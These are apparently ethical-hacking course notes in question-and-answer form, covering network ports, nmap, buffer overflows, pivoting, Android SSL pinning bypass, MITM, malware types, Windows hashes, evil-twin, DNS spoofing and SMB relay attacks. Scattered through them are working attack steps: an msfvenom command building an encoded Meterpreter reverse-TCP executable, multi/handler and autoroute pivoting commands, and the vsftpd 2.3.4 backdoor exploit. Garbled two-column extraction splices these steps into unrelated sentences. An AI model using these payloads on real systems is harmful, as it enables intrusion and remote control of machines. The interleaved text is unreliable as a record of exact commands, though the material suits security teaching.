HTTP stands for HyperText Transfer Protocol, while HTTPS stands for
Unit 1
1. What are the common ports? Give a list of any 5 common ports with
names of services running and the type of attacks that can be performed.
1. FTP (20, 21)
FTP stands for File Transfer Protocol. Port 20 and 21 are solely TCP ports
used to allow users to send and to receive files from a server to their personal
computers. The FTP port is insecure and outdated and can be exploited using:
Anonymous authentication. You can log into the FTP port with both
username and password set to "anonymous". Cross-Site Scripting. Brute-
forcing passwords. Directory traversal attacks.
2. SSH (22)
SSH stands for Secure Shell. It is a TCP port used to ensure secure remote
access to servers. You can exploit the SSH port by brute-forcing SSH
credentials or using a private key to gain access to the target system.
3. SMB (139, 137, 445)
SMB stands for Server Message Block. It is a communication protocol
created by Microsoft to provide sharing access of files and printers across a
network. When enumerating the SMB port, find the SMB version, and then
you can search for an exploit on the internet, Searchsploit, or Metasploit. The
SMB port could be exploited using the EternalBlue vulnerability, brute
forcing SMB login credentials, exploiting the SMB port using NTLM
Capture, and connecting to SMB using PSexec. An example of an SMB
vulnerability is the Wannacry vulnerability that runs on EternalBlue
4. DNS (53)
DNS stands for Domain Name System. It is both a TCP and UDP port used
for transfers and queries respectively. One common exploit on the DNS ports
is the Distributed Denial of Service (DDoS) attack.
5. HTTP / HTTPS (443, 80, 8080, 8443)
HyperText Transfer Protocol Secure (which is the more secure version of
HTTP). These are the most popular and widely used protocols on the internet,
and as such are prone to many vulnerabilities. They are vulnerable to SQL
injections, cross-site scripting, cross-site request forgery, etc
6. Telnet (23)
The Telnet protocol is a TCP protocol that enables a user to connect to remote
computers over the internet. The Telnet port has long been replaced by SSH,
but it is still used by some websites today. It is outdated, insecure, and
vulnerable to malware. Telnet is vulnerable to spoofing, credential sniffing,
and credential brute-forcing.
7. SMTP (25)
SMTP stands for Simple Mail Transfer Protocol. It is a TCP port used for
sending and receiving mails. It can be vulnerable to mail spamming and
spoofing if not well-secured.
2. Explain the Client & server mechanism.
The Client-server model is a distributed application structure that partitions
task or workload between the providers of a resource or service, called
servers, and service requesters called clients. In the client-server architecture,
when the client computer sends a request for data to the server through the
internet, the server accepts the requested process and deliver the data packets
requested back to the client. Clients do not share any of their resources.
Examples of Client-Server Model are Email, World Wide Web, etc.
How the Client-Server Model works ?
In this article we are going to take a dive into the Client-Server model and
have a look at how the Internet works via, web browsers. This article will
help us in having a solid foundation of the WEB and help in working with
WEB technologies with ease.
1
 • Client: When we talk the word Client, it mean to talk of a person or
an organization using a particular service. Similarly in the digital
world a Client is a computer (Host) i.e. capable of receiving
information or using a particular service from the service providers
(Servers).
• Servers: Similarly, when we talk the word Servers, It mean a person
or medium that serves something. Similarly in this digital world
a Server is a remote computer which provides information (data) or
access to particular services.
3. What is nmap? Explain the Aggressive Detection command in Nmap.
• Nmap is short for Network Mapper. It is an open-source Linux command-
line tool that is used to scan IP addresses and ports in a network and to
detect installed applications.
• Nmap allows network admins to find which devices are running on their
network, discover open ports and services, and detect vulnerabilities.
• Most of its functions are based on using IP packet analysis to detect and
identify remote hosts, operating systems and services.
• Nmap is used by large companies as well as smaller-sized organizations
for port auditing, host monitoring, penetration testing and similar tasks.
• Even with Nmap constantly being updated with new features since
decades, its core function remains as a port scanner, helping users gather
data by sending packets to local or remote ports. This is done by waiting
for packet responses to determine if ports are closed, open or filtered.
• Nmap has a special flag to activate aggressive detection, namely -A.
• Aggressive mode enables OS detection (-O), version detection (-sV),
script scanning (-sC), and traceroute (--traceroute). This mode sends a lot
more probes, and it is more likely to be detected, but provides a lot of
valuable host information.
• Aggressive scans provide far better information than regular scans.
4. Explain buffer overflow attack with it’s types and impact on the
system.
• Buffer overflows can affect all types of software. They typically result
from malformed inputs or failure to allocate enough space for the buffer.
• If the transaction overwrites executable code, it can cause the program to
behave unpredictably and generate incorrect results, memory access
errors, or crashes
• Attackers exploit buffer overflow issues by overwriting the memory of
an application.
• This changes the execution path of the program, triggering a response that
damages files or exposes private information.
• For example, an attacker may introduce extra code, sending new
instructions to the application to gain access to IT systems.
• If attackers know the memory layout of a program, they can intentionally
feed input that the buffer cannot store, and overwrite areas that hold
executable code, replacing it with their own code.
Types of Buffer Overflow Attacks
Stack based buffer
2
• Stack-based buffer overflows are more common, and leverage stack LHOST=192.168.5.243 LPORT=4444 --bad-char
memory that only exists during the execution time of a function. '\x00\x0a\x0d\x04\xa1' -f exe -o /root/adi.exe
• It is a continuous space in memory used to organize data associated with • Use exploit/multi/handler
function calls, including function parameters, function local variables and • Set payload windows/meterpreter/reverse_tcp
• Set lhost 192.168.5.243
management information, such as frame and instruction pointers
• Getuid
Heap based attack • run autoroute -s 192.168.5.1/24
• Heap-based attacks are harder to carry out and involve flooding the • run autoroute -p
memory space allocated for a program beyond memory used for current • search for the port scan. Use TCP port scan auxillary module
runtime operations. • set the port range 20-25
• Search ftp version
• The heap is a memory structure used to manage dynamic memory.
• Set RHOSTS 192.168.5.70. Run
• Programmers often use the heap to allocate memory whose size is not
• Search vsftpd 2.3.4
known at compile time, where the amount of memory required is too large
• Set RHOST 192.168.5.70 Start the Exploit. It will open a shell. Confirm
to fit on the stack or the memory is intended to be used across function the exploited system is Metasploitable using uname -a
calls.

5. Explain pivoting with one practical example.

Pivoting is a technique that Metasploit uses to route the traffic from a hacked
computer toward other networks that are not accessible by a hacker machine.
• A network with the range 192.168.1.0/24 where the hacker machine has
access, and
• Another network with the range 10.10.10.0/24. It is an internal network
and the hacker doesn’t have access to it.
The hacker will try to hack the second network this machine that has access
in both networks to exploit and hack other internal machines.
In this scenario, a hacker will first break into the first network and then use it
as a staging point to exploit and hack the internal machines of the second
network. This process is known as pivoting because the hacker is using the
UNIT – II
first network as a pivot to get access into the second network.
1. What is apk signing? Why it is required?
• msfvenom -a x86 --platform windows -p
windows/meterpreter/reverse_tcp - e x86/shikata_ga_nai -i 4
3
Ans. Application signing allows developers to identify the author of the
application and to update their application without creating complicated
interfaces and permissions. Every application that is run on the Android
platform must be signed by the developer. Applications that attempt to install
without being signed will be rejected by either Google Play or the package
installer on the Android device.
On Google Play, application signing bridges the trust Google has with the
developer and the trust the developer has with their application. Developers
know their application is provided, unmodified, to the Android device; and
developers can be held accountable for behavior of their application.
On Android, application signing is the first step to placing an application in
its Application Sandbox. The signed application certificate defines which
user ID is associated with which application; different applications run under
different user IDs. Application signing ensures that one application cannot
access any other application except through well-defined IPC.
When an application (APK file) is installed onto an Android device, the
Package Manager verifies that the APK has been properly signed with the
certificate included in that APK. If the certificate (or, more accurately, the
public key in the certificate) matches the key used to sign any other APK on
the device, the new APK has the option to specify in the manifest that it will
share a UID with the other similarly-signed APKs.
Applications can be signed by a third-party (OEM, operator, alternative
market) or self-signed. Android provides code signing using self-signed
certificates that developers can generate without external assistance or
permission. Applications do not have to be signed by a central authority.
Android currently does not perform CA verification for application
certificates.
Applications are also able to declare security permissions at the Signature
protection level, restricting access only to applications signed with the same
key while maintaining distinct UIDs and Application Sandboxes. A closer
relationship with a shared Application Sandbox is allowed via the shared UID
feature where two or more applications signed with same developer key can
declare a shared UID in their manifest.
2. What SSL pinning in apk? How would you bypass it?
Ans. SSL pinning is a mechanism used to satisfy this requirement: it enables
the user to identify a server based on an SSL certificate stamp embedded into
the app. This makes Man-In-the-Middle attacks almost impossible and
prevents the interception of the data traffic between a client and a server.
At the same time, this mechanism complicates the application analysis during
penetration testing involving BlackBox or GreyBox methods because the
pentester has to identify this mechanism and implement some workaround to
intercept the traffic and analyze the client–server interaction. This article
describes one of the ways to overcome SSL pinning in Android apps.
How would you bypass it?
Technique – Overwrite Packaged CA Certificate with Custom CA Certificate
What if you successfully install your certificate to the user-added CA store,
the application is targeting Android 6.0, and your certificate shows up as valid
when you try and browse other SSL-protected resources, but the application
still dies with SSL errors? It’s possible that the developers have taken
additional steps to restrict the set of CAs trusted by the application. Recall
from technique 1 we defined a custom trust anchor and provided a path to a
CA certificate – this is intended functionality that may be used by developers
to attempt to protect their application from SSL interception.
If a custom certificate chain is being
distributed with an application,
extracting the APK and overwriting
the provided CA with our custom CA
should be enough to cause our
intercepting certificate to be trusted.
Note that in some cases, additional
verification of the trust chain may be
happening, so this method may yield
mixed results.
4

Opening the APK with a tool such as APK Studio makes the presence of
certificates bundled with the deployed application obvious. In the image
above, the certificates are located under the ‘assets’ directory. Overwriting
the aptly-named ‘UniversalRootCA’ certificate with our custom CA should
allow us to trick the application into accepting our certificate.
3. What is MITM attack? Give one example
Ans. A man-in-the-middle attack represents a cyberattack in which a
malicious player inserts himself into a conversation between two parties,
impersonates both of them, and gains access to the information that the two
parties were trying to share. The malicious player intercepts, sends, and
receives data meant for someone else – or not meant to be sent at all, without
either outside party knowing until it’s already too late.
Examples –
➢ IP SPOOFING
The Internet Protocol Address (IP) refers to a numerical label that is assigned
to each device that connects to a computer network that uses the Internet
Protocol for communication. IP addresses have two main functions: host or
network interface identification and location addressing.
➢ HTTPS SPOOFING
The HyperText Transfer Protocol (HTTP) represents the foundation of data
communication for the World Wide Web, hypertext documents including
hyperlinks to other resources that users can access.
➢ DNS SPOOFING
The Domain Name System (DNS) is a hierarchical and decentralized naming
system for computers, services, or other resources that are connected to the
Internet, which translates more readily memorized domain names to the
numerical IP addresses needed for localization and identification.
➢ SSL HIJACKING
SSL stands for Secure Sockets Layers and is a type of protocol that enacts
encrypted links between your browser and the webserver. When you connect
to a secure server (guaranteed by HTTPS), you expect standard security
protocols to be in place, protecting whatever data is shared between it and
your devices.
➢ EMAIL HIJACKING
E-mail hijacking is a type of man-in-the-middle attack used by
cybercriminals to target banks’ email accounts or other financial institutions.
After they obtain access, all the transactions between an institution and its
clients can be supervised.
5
4. Provide differences between Firewall, IDS&IPS. Reply from 127.0.0.1: bytes=32 time<10ms TTL=32
The IP address 127.0.0.1 is the address of the local host and would receive a
ping reply even if the sender is not connected to the internet.
Traceroute: It is a utility that traces a packet from your computer to the host,
and will also show the number of steps (hops) required to reach there, along
with the time by each step. Traceroute works by sending the packets of data
with a low survival time (Time to Live – TTL) which specifies how many
steps (hops) can the packet survive before it is returned. When a packet can’t
reach the final destination and expires at an intermediate step, that node
returns the packet and identifies itself. So, by increasing the TTL gradually,
Traceroute is able to identify the intermediate hosts. If any of the hops come
back with “Request timed out”, it denotes network congestion and a reason
for slow-loading Web pages and dropped connections.
The main difference between Ping and Traceroute is that Ping is a quick and
easy utility to tell if the specified server is reachable and how long will it take
to send and receive data from the server whereas Traceroute finds the exact
route taken to reach the server and time taken by each step (hop).

5. Briefly explain the traceroute and PING, and the types of information
we can gather?
Ping: It is a utility that helps one to check if a particular IP address is
accessible or not. Ping works by sending a packet to the specified address and
waits for a reply. It also measures round trip time and reports errors.
Ping is also used in checking if the computers on a local network are active.
For this, the user has to go to the command prompt and type: ping 127.0.0.1,
and if the address is active, the ping would return a message like this:
Pinging 127.0.0.1 with 32 bytes of data
Reply from 127.0.0.1: bytes=32 time<10ms TTL=32
Reply from 127.0.0.1: bytes=32 time<10ms TTL=32
Reply from 127.0.0.1: bytes=32 time<10ms TTL=32

6

6. What is malware? Explain types of malwares?
MALWARE –
➢ Malware is a program designed to gain access to computer systems,
normally for the benefit of some third party, without the user’s
permission.
➢ Malware includes computer viruses, worms, Trojan horses, ransomware,
spyware and other malicious programs.
Types of Malware –
➢ VIRUSES
Malware is a program designed to gain access to computer systems, normally
for the benefit of some third party, without the user’s permission. Malware
includes computer viruses, worms, Trojan horses, ransomware, spyware and
other malicious programs.
➢ WORMS
Worms replicate themselves on the system, attaching themselves to different
files and looking for pathways between computers, such as computer network
that shares common file storage areas.
➢ SPYWARES
Its purpose is to steal private information from a computer system for a third
party. Spyware collects information and sends it to the hacker.
➢ TROJAN HORSE
A Trojan horse varies from a virus because the Trojan binds itself to non-
executable files, such as image files, audio files.
➢ LOGIC BOMBS
A logic bomb is a malicious program that uses a trigger to activate the
malicious code. The logic bomb remains non-functioning until that trigger
event happens. Once triggered, a logic bomb implements a malicious code
that causes harm to a computer.
➢ RANSOMEWARE
Ransomware grasps a computer system or the data it contains until the victim
makes a payment. Ransomware encrypts data in the computer with a key
which is unknown to the user.
➢ BACKDOORS
A backdoor bypasses the usual authentication used to access a system. The
purpose of the backdoor is to grant the cyber criminals future access to the
system even if the organization fixes the original vulnerability used to attack
the system.
➢ ROOTKITS
A rootkit modifies the OS to make a backdoor. Attackers then use the
backdoor to access the computer distantly. Most rootkits take advantage of
software vulnerabilities to modify system files.
➢ KEYLOGGERS
Keylogger records everything the user types on his/her computer system to
obtain passwords and other sensitive information and send them to the source
of the keylogging program.
Unit 3
1. What are the file inclusion vulnerabilities? Explain with its types.
• File Inclusion vulnerabilities often affect web applications that rely on a
scripting run time and occur when a web application allows users to
submit input into files or upload files to the server. They are often found
in poorly written applications.
• File Inclusion vulnerabilities allow an attacker to read and sometimes
execute files on the victim server or, as is the case with Remote File
Inclusion, to execute code hosted on the attacker’s machine.
• An attacker may use remote code execution to create a web shell on the
server and use that web shell for website defacement.
7
 Types
• File inclusion vulnerabilities come in two types, depending on the origin
of the included file:
I. Local File Inclusion (LFI)
- An LFI vulnerability allows attackers to access or execute files hosted
locally on the application server.
- This is possible in applications that allow the path to a file on the server
to be used as user input and do not sanitize such input.
- These attacks typically occur when an application uses the path to a file
as input.
- If the application treats that input as trusted, an attacker can use the local
file in an include statement.
- While Local File Inclusion and Remote File Inclusion are very similar,
an attacker using LFI may include only local files.
II. Remote File Inclusion (RFI)
- The remote file inclusion (RFI) vulnerability is made possible by
applications that dynamically reference external files or scripts without
proper sanitization.
- By exploiting the vulnerability, an attacker forces the server to download
and execute arbitrary files that are located remotely that can open
backdoor shells.
- These can lead to data being stolen or damaged, websites being defaced
and having malware installed, or a full-server compromise and takeover.
- The results of a successful RFI attack can be information theft, a
compromised server, and a site takeover, resulting in content
modification.
- To minimize the risk of RFI attacks, proper input validation and
sanitization must be implemented.
2. What is UAC in windows? Why you need to bypass the UAC in
windows?
• User Account Control or UAC for short is a security feature of Windows
which helps prevent unauthorized changes to the operating system.
• These changes can be initiated by applications, users, viruses or other
forms of malware.
• User Account Control makes sure certain changes are made only with
approval from the administrator.
• If the changes are not approved by the administrator, they are not
executed, and Windows remains unchanged. It is as if nothing happened.
• UAC was first made available for Windows Vista, and since then it was
improved with each new version of Windows.
• When you double-click on a file, a setting or an app that is about to make
important changes to Windows, you are shown a User Account Control
(UAC) prompt.
• The UAC prompt displays the name of the program that is about to make
a system change that requires the approval of an administrator, the
publisher of that program and the file origin.
3. Briefly explain authentication mechanism and hashes of Microsoft
Windows.
Windows authentication
• Windows-based authentication is manipulated between the Windows
server and the client machine.
• The ASP.NET applications reside in Internet Information Server (IIS).
Any user's web request goes directly to the IIS server, and it provides the
authentication process in a Windows-based authentication model.
• This type of authentication is quite useful in an intranet environment in
which users are asked to log into a network.
• In this scenario, you can utilize the credentials that are already in place
for the authentication and authorization process. This authentication is
done by IIS.
• It first accepts user's credentials from the domain login
"Domain\UserName and Password". If this process fails, then IIS
displays an error and asks to re-enter the login information.
• The following are the advantages of Windows Authentication:
- It relies on and allows the user to use existing Windows Accounts.
8
- Establishes the foundation for a Uniform Authentication model for
multiple types of applications.
- For developers it is easy to implement.
• The following are the disadvantages of Windows Authentication:
- Applicable to Microsoft platforms only.
- No custom control over this platform provided authentication process.
Hashes
➢ LM
- The LM hash is used for storing passwords.
- It is disabled in W7 and above.
- However, LM is enabled in memory if the password is less than 15
characters.
- That's why all recommendations for admin accounts are 15+ chars.
- LM is old, based on MD4 and easy to crack.
- The reason is that Windows domains require speed, but that also
makes for security.
➢ NT
- The NT hash calculates the hash based on the entire password the
user entered.
- The LM hash splits the password into two 7-character chunks,
padding as necessary.
➢ NTLM
- The NTLM hash is used for local authentication on hosts in the
domain.
- It is a combination of the LM and NT hash as seen above.
- This is the way passwords are stored on modern Windows systems,
and can be obtained by dumping the SAM database, or using
Mimikatz.
- They are also stored on domain controllers in the NTDS file.
- These are the hashes you can use to pass-the-hash.
- These use the NT-hash in the algorithm, which means it can be used
to recover the password through Brute Force/Dictionary attacks.
4. What is active directory and domain controller? What is the purpose
of a domain controller in Active Directory?
Active Directory
▪ A directory service produced by the Microsoft for the networks of
windows domain is known as the active directory whereas a server that
responds to the authentication security requests such as checking
permissions, logging in, etc. for the window domain is known as a domain
controller.
▪ Active Directory comprises of various services that work on the windows
server and manage the access and permissions to the resourced network.
It is the product developed by Microsoft.
▪ It stores the data in the form of objects. These objects are single elements
such as group, user, device or application.
▪ The categorization of the objects is done by the attributes and name which
includes the information related with the user, for example, secure shell
keys and passwords.
▪ Domain services are the main service of the active directory that
comprises information of directory and communicated between the users
and domain.
▪ The main function of the active directory is to store information regarding
all the resources and users in an organized and well-planned manner.
Domain Controller
▪ A server that gives the response to the verification requests and confirms
the users on the computer networks are known as a domain controller.
▪ It helps to organize the computers and users that work simultaneously on
a similar network in a hierarchical way.
▪ The controller helps to retain all the data in an organized manner and also
keep secure. The domain controller (DC) is considered as the key for the
active directory (AD).
▪ Attackers are aware of all the tricks used to fetch the data including the
DC itself.
▪ Though you are not able to protect your DCs from the attackers these DCs
can help to find out the cyber-attacks.
9
▪ The primary function of the DC is to validate and authenticate the user
that has access on the network.
▪ They are responsible for checking the username, passwords and other
credentials, as well as they, have the right to allow or deny the user who
is trying to access.
Purpose of Active directory in domain controller
• Domain control is a function of Microsoft's Active Directory, and domain
controllers are servers that can use Active Directory to respond to
authentication requests.
• Active Directory is a type of domain, and a domain controller is an
important server on that domain.
• The primary responsibility of the DC is to authenticate and validate user
access on the network. When users log into their domain, the DC checks
their username, password, and other credentials to either allow or deny
access for that user.
Unit 04
1. Illustrate evil-twin attack.
Evil twin attacks are a type of Man in the Middle (MitM) attack in which a
fake Wi-Fi network is set up to steal information or further infiltrate a
connecting device.
This is often done in public settings where people are most likely to look for
or connect to freely available Wi-Fi. This can be in airports, cafes, large
public parks, etc., but hackers can really leverage this attack anywhere,
mainly because the fake Wi-Fi can be easily set up and deployed.
How an evil twin attack affects you
If successful, a hacker has essentially intercepted your internet connection,
connecting you to them. This can mean the hacker can steal your login
information, see sensitive details and info from the websites you visit, and
even redirect certain commands and tasks.
How does an evil twin attack work?
Step one: Evil twin Wi-Fi setup
First, a hacker situates themselves in a prime location where people are
looking to connect to free Wi-Fi networks.
Using a device like a hotspot or Wi-Fi Pineapple, they can set up their own
Wi-Fi network. Using a tool like hostapd-wpe, they can impersonate any
network and, given enough time, even obtain the network credentials.
To impersonate an existing connection, they’ll likely use the same SSID (the
name of the network) as the one that already exists.
Step two: Captive portal setup
The captive portal is usually the separate web page or initial pop-up after
connecting to a Wi-Fi network. Most often, it asks you for some details before
letting you access the internet.
A tool like dnsmasq can be used to create captive portals and spoof DNS
servers to increase the semblance of legitimacy.
10
Step three: Push victims to connect to the evil twin Wi-Fi connection particular website it goes to the DNS server to resolve the IP address
At this point, unsuspecting victims looking to connect to Wi-Fi will probably of that website.
see two different connections with the same name. To increase their odds of 2. Inject Fake DNS entry: Hackers already take control over the DNS
success, they can physically move the hotspot or Wi-Fi-emitting device server by detecting the flaws and now they add false entries to the
closer to the victims, so the connection appears first and is stronger than the DNS server.
real connection. They can also flood the original connection with a denial of 3. Resolve to Fake Website: Since the fake entry in the DNS server
service (DoS) attack. redirect the user to the wrong website.
Step four: Individual, device & organizational compromise
3. Illustrate ping of death attack.
Once the victim connects to the network, they’re shown the fake captive
Ping of Death (a.k.a. PoD) is a type of Denial of Service (DoS) attack in
portal, which can be the beginning of data theft. Because the hacker can now
which an attacker attempts to crash, destabilize, or freeze the targeted
monitor your connection, they can log keystrokes and see your activity as you
computer or service by sending malformed or oversized packets using a
browse the internet. Hackers can deploy packet injections that can replace
simple ping command.
content on the site a victim is navigating to (for example, to direct them to a
While PoD attacks exploit legacy weaknesses which may have been patched
malicious website), or payload,s (in the form of malicious code, ransomware,
in target systems. However, in an unpatched systems, the attack is still
or malware) can be deployed within downloaded files, without the victim
relevant and dangerous. Recently, a new type of PoD attack has become
ever knowing.
popular. This attack, commonly known as a Ping flood, the targeted system
is hit with ICMP packets sent rapidly via ping without waiting for replies.
2. How would you perform DNS Spoofing attack?
▪ A Domain Name System (DNS) converts a human-readable name to a
Attack description
numeric IP address.
The size of a correctly-formed IPv4 packet including the IP header is 65,535
▪ There is not only one DNS server. There are series of DNS servers used
bytes, including a total payload size of 84 bytes. Many historical computer
to resolve the domain name. DNS uses cache to work efficiently so that
systems simply could not handle larger packets, and would crash if they
it can quickly refer to DNS lookups it’s already performed rather than
received one. This bug was easily exploited in early TCP/IP implementations
performing a DNS lookup over and over again.
in a wide range of operating systems including Windows, Mac, Unix, Linux,
▪ DNS Spoofing means getting a wrong entry or IP address of the requested
as well as network
site from the DNS server. Attackers find out the flaws in the DNS system
devices like printers
and take control and
and routers.
will redirect to a
Since sending a ping
malicious website.
packet larger than
In above image – 65,535 bytes
violates the Internet
1. Request to Real
Protocol, attackers
Website: User hits
would generally
a request for a
send malformed
11
packets in fragments. When the target system attempts to reassemble the
fragments and ends up with an oversized packet, memory overflow could
occur and lead to various system problems including crash.
Ping of Death attacks were particularly effective because the attacker’s
identity could be easily spoofed. Moreover, a Ping of Death attacker would
need no detailed knowledge of the machine he/she was attacking, except for
its IP address.
It is worthy of note that this vulnerability, though best recognized for its
exploitation by PoD attacks, can actually be exploited by anything that sends
an IP datagram – ICMP echo, TCP, UDP and IPX.
4. What is SMB relay attack?
SMB Relay Attack is a type of attack which relies on NTLM Version 2
authentication that is normally used in most companies.
Unfortunately, when we are listening to what is going on in the network,
we’re able to capture a certain part of the traffic related to the authentication
and also relay it to the other servers.
This kind of attack is very dangerous because anybody with access to the
network can capture traffic, relay it, and get unauthorized access to the
servers.
How does an SMB Relay Attack Happen?
▪ The SMB Relay attack abuses the NTLM challenge-response protocol.
Commonly, all SMB sessions used the NTML protocol for encryption
and authentication purposes (i.e. NTLM over SMB). However, most
sysadmins switched to KILE over SMB after research proved that the first
version of NTLM is susceptible to Man-in-the-Middle attacks, the SMB
Relay attack counting among them.
▪ Now, in normal client-server communication, there are a series of
requests followed by responses. The idea behind an SMB Relay attack is
to position yourself between the client and the server in order to capture
the data packets transmitted between the two entities.
Attack steps
Step 1. Scanning the network. A tool like NMAP is used to scan out the
network for shares and IP addresses. Alternatively, you can use Metasploit to
quickly map out network shares.
Step 2. Using Metasploit or a similar tool, to conduct the attack. Remember
that the purpose of this endeavor is to capture and ‘listen’ to enough auth
packets in order to trick the server into believing that the attacker is actually
the user.
Step 3. If the server’s running NTLM version 2.0, you would need to
approach this differently, and that way would be the Impacket (i.e. collection
of network protocols).
Step 4. The payload’s created with msfvenom. After that, we can use
Metasploit to commence the Meterpreter session. Be warned – your payload
is doomed to fail if the target machine doesn’t have administrator rights to
the duped server.
Step 5. Once the payload’s delivered, you would have gained access to the
shell. That’s it! You’re in and can do whatever you want (or not).
12